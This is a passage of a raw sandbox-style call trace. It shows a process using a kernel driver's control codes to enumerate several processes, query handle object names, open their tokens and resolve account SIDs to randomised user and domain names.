Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.796] ObfDereferenceObject (Object=0xfffffa80020e9810) returned 0x1 [0156.796] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.796] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.796] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.796] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.796] PsAcquireProcessExitSynchronization () returned 0x0 [0156.796] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880051635d0) [0156.797] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.797] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.797] PsReleaseProcessExitSynchronization () returned 0x2 [0156.797] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0156.797] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030d5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d5044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.797] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.797] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.797] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b4) returned 0xc8 [0156.797] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.797] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001fc7b30, HandleInformation=0x0) returned 0x0 [0156.797] ObOpenObjectByPointer (in: Object=0xfffffa8001fc7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.797] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x14 [0156.797] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.797] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.797] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.797] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.798] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.799] CloseHandle (hObject=0xc4) returned 1 [0156.799] CloseHandle (hObject=0xc8) returned 1 [0156.799] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.799] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.799] PsAcquireProcessExitSynchronization () returned 0x0 [0156.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880051635d0) [0156.800] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020f2d70, HandleInformation=0x0) returned 0x0 [0156.800] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.800] PsReleaseProcessExitSynchronization () returned 0x2 [0156.800] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0156.800] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d4044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.800] ObfDereferenceObject (Object=0xfffffa80020f2d70) returned 0x1 [0156.800] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.800] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.800] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0156.800] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.800] PsAcquireProcessExitSynchronization () returned 0x0 [0156.800] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880051635d0) [0156.800] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800d49bd10, HandleInformation=0x0) returned 0x0 [0156.800] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.800] PsReleaseProcessExitSynchronization () returned 0x2 [0156.800] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0156.800] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030cb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030cb044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.800] ObfDereferenceObject (Object=0xfffffa800d49bd10) returned 0x1 [0156.800] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.800] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.801] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.801] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.801] PsAcquireProcessExitSynchronization () returned 0x0 [0156.801] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880051635d0) [0156.801] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.801] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.801] PsReleaseProcessExitSynchronization () returned 0x2 [0156.801] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0156.801] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030bf044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030bf044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.801] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.801] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0xc8 [0156.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.801] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f6e180, HandleInformation=0x0) returned 0x0 [0156.801] ObOpenObjectByPointer (in: Object=0xfffffa8001f6e180, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.801] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x14 [0156.801] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.801] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.801] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.801] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.803] CloseHandle (hObject=0xc4) returned 1 [0156.803] CloseHandle (hObject=0xc8) returned 1 [0156.803] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.803] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.803] PsAcquireProcessExitSynchronization () returned 0x0 [0156.803] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880051635d0) [0156.803] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020fe1a0, HandleInformation=0x0) returned 0x0 [0156.803] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.804] PsReleaseProcessExitSynchronization () returned 0x2 [0156.804] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0156.804] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030e0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030e0044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.804] ObfDereferenceObject (Object=0xfffffa80020fe1a0) returned 0x1 [0156.804] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.804] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.804] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0156.804] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.804] PsAcquireProcessExitSynchronization () returned 0x0 [0156.804] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880051635d0) [0156.804] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020fe2f0, HandleInformation=0x0) returned 0x0 [0156.804] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.804] PsReleaseProcessExitSynchronization () returned 0x2 [0156.804] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0156.804] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.804] ObfDereferenceObject (Object=0xfffffa80020fe2f0) returned 0x1 [0156.804] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.804] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.804] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.804] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.804] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.804] PsAcquireProcessExitSynchronization () returned 0x0 [0156.804] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880051635d0) [0156.804] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.804] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.804] PsReleaseProcessExitSynchronization () returned 0x2 [0156.804] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0156.805] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.805] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.805] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.805] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8d4) returned 0xc8 [0156.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.805] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f77b30, HandleInformation=0x0) returned 0x0 [0156.805] ObOpenObjectByPointer (in: Object=0xfffffa8001f77b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.805] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x14 [0156.805] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.805] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.805] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.805] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.805] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.807] CloseHandle (hObject=0xc4) returned 1 [0156.807] CloseHandle (hObject=0xc8) returned 1 [0156.807] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.807] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.807] PsAcquireProcessExitSynchronization () returned 0x0 [0156.807] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880051635d0) [0156.807] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fdc070, HandleInformation=0x0) returned 0x0 [0156.807] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.807] PsReleaseProcessExitSynchronization () returned 0x2 [0156.807] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0156.807] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d7044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.807] ObfDereferenceObject (Object=0xfffffa8001fdc070) returned 0x1 [0156.808] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0156.808] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.808] PsAcquireProcessExitSynchronization () returned 0x0 [0156.808] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880051635d0) [0156.808] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fe2dd0, HandleInformation=0x0) returned 0x0 [0156.808] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.808] PsReleaseProcessExitSynchronization () returned 0x2 [0156.808] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0156.808] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d6044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.808] ObfDereferenceObject (Object=0xfffffa8001fe2dd0) returned 0x1 [0156.808] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.808] PsLookupProcessByProcessId (in: ProcessId=0x8d4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.809] PsAcquireProcessExitSynchronization () returned 0x0 [0156.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f77b30, ApcState=0xfffff880051635d0) [0156.809] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.809] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.809] PsReleaseProcessExitSynchronization () returned 0x2 [0156.809] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x12 [0156.809] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.267] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.267] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.267] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e4) returned 0xc8 [0158.268] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.268] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800208ab30, HandleInformation=0x0) returned 0x0 [0158.268] ObOpenObjectByPointer (in: Object=0xfffffa800208ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.268] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x14 [0158.268] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.268] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.268] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.268] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.268] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) 